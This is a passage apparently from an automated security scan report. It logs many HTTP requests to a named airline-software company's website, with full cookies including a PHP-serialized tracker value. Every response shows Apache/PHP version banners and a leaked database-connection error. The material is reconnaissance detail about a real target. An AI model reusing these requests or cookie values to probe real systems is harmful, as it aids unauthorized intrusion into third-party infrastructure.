exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A3%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A4%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:31:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/downloads/images HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/images/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:32:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/downloads/images/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:31:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/downloads/images/pdf_icon.gif HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:31:42 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/images/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:46:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/images/pdf_icon.gif HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:47:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/my_list HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/my_list/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323116; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_profit%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fenterprise_operations%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_revenue%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:41:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/sabre_airvision_network HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322910; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:30:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/sabre_airvision_network/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:30:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/commercial_planning/sabre_airvision_revenue HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_revenue/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322997; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:35:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/enterprise_operations/airport HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321948; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A2%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_accounting%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:33:35 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/enterprise_operations/control_cost/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:36:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/enterprise_operations/downloads/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:34:55 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/enterprise_operations/downloads/images/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323057; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fairline_reservations%2Fmy_list%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A75%3A%22%2Fproducts_services%2Fcommercial_planning%2FSabre_AirVision_Market_Intelligence%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fmultitask_manager%2F%22%3Bi%3A4%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:34:56 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/enterprise_operations/images/pdf_icon.gif HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:51:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/enterprise_operations/manage_change/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:35:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/enterprise_operations/sabre_aircentre_crew/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322006; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3Bi%3A2%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A3%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_accounting%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:33:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/enterprise_operations/sabre_aircentre_flight/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322057; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A1%3Bs%3A41%3A%22%2Fproducts_services%2Fenterprise_operations%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:34:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/enterprise_operations/sabre_aircentre_maintenance/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322146; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A4%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:34:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/corporate_management HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322800; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A4%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:04:01 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/developer_tool HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322800; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_group_ecommerce%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:26:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
